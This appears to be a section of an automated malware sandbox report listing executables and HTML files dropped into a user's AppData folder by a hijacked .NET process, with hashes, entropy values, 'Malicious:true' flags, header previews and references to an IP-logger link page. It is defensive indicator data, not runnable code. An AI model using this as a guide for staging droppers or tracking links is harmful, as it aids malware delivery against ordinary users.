                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......:R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\hKiTsf257VLWDEryVqhdGiax.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\i5XdJ65IHwp8ssJDgSUt738t.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\idw0Y68mq2UfXecINGuMfSFO.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\jTODdSkaulFxtvMU8WoUUyzs.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\kkscE0U22us2Ek0MCP4ULYeK.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\lOl0Z8MedrKL384KSuZP1lEu.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\mPkGObww76qlp1C09a4tgBES.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\nCCWNGZR7QSL7YK34Xz98mnq.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\p9kj7yqazy7x5QKCpeuskKjf.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\qGkRm1tZi3ZgbNWlurynDnJq.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\r1G18V8V8shEwNWwtcDq5rcn.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\rCkxIY3aeSpXebK5FfkxePC4.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884112617188526
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:J0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwv:cPMki6zio75L3pf3dedO4keCIwkoYbgP
                                                                                                                                                                                                                                MD5:4000388D97FD96DA5DFAA35BDAF6BED2
                                                                                                                                                                                                                                SHA1:F32B111298B0C4DC0BAF1DC928090024491952A2
                                                                                                                                                                                                                                SHA-256:673EA1BDB250EC7D59D9F0158C925173AFE99A5CED13601D29C75F494FFEF092
                                                                                                                                                                                                                                SHA-512:34BC638C760ACB83AC38C8384FDAF3AE44702970DF3F54AB2D82DD1DF98FBA4AAAC85D19683812DE25529FE856EB75C9184743A3DB594FCFC7C5BC3B80B421B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......OR...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\rdJ9fWEopei9Jq2a4C4fmX3Z.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884109201607148
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:90NF76666666666666666666666666666666x666666666666666fwwwwwwwwww8:gPMki6zio75L3pf3dedO4keCIwkoYbgc
                                                                                                                                                                                                                                MD5:3ED2971717DB27FEA047B5E6EFCB5995
                                                                                                                                                                                                                                SHA1:1972C938DFC19582FD748AC9D4511FB07E6E5C51
                                                                                                                                                                                                                                SHA-256:AB62EB46A10B9434A8AD5302329DF1CD108F31CA5B6FE1B66431C6D503E7779D
                                                                                                                                                                                                                                SHA-512:27A2722C52A6C06E90B46E63A2D9960D37BEB634116F79CDF70B5D9C57D8C9D6C3B35A45A2C051463CA00BD9EA7F58244CE7FE187706070BE301CE7E998B5508
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....\/S...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\saftSBfOyQtbUhRB42BwTwJm.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
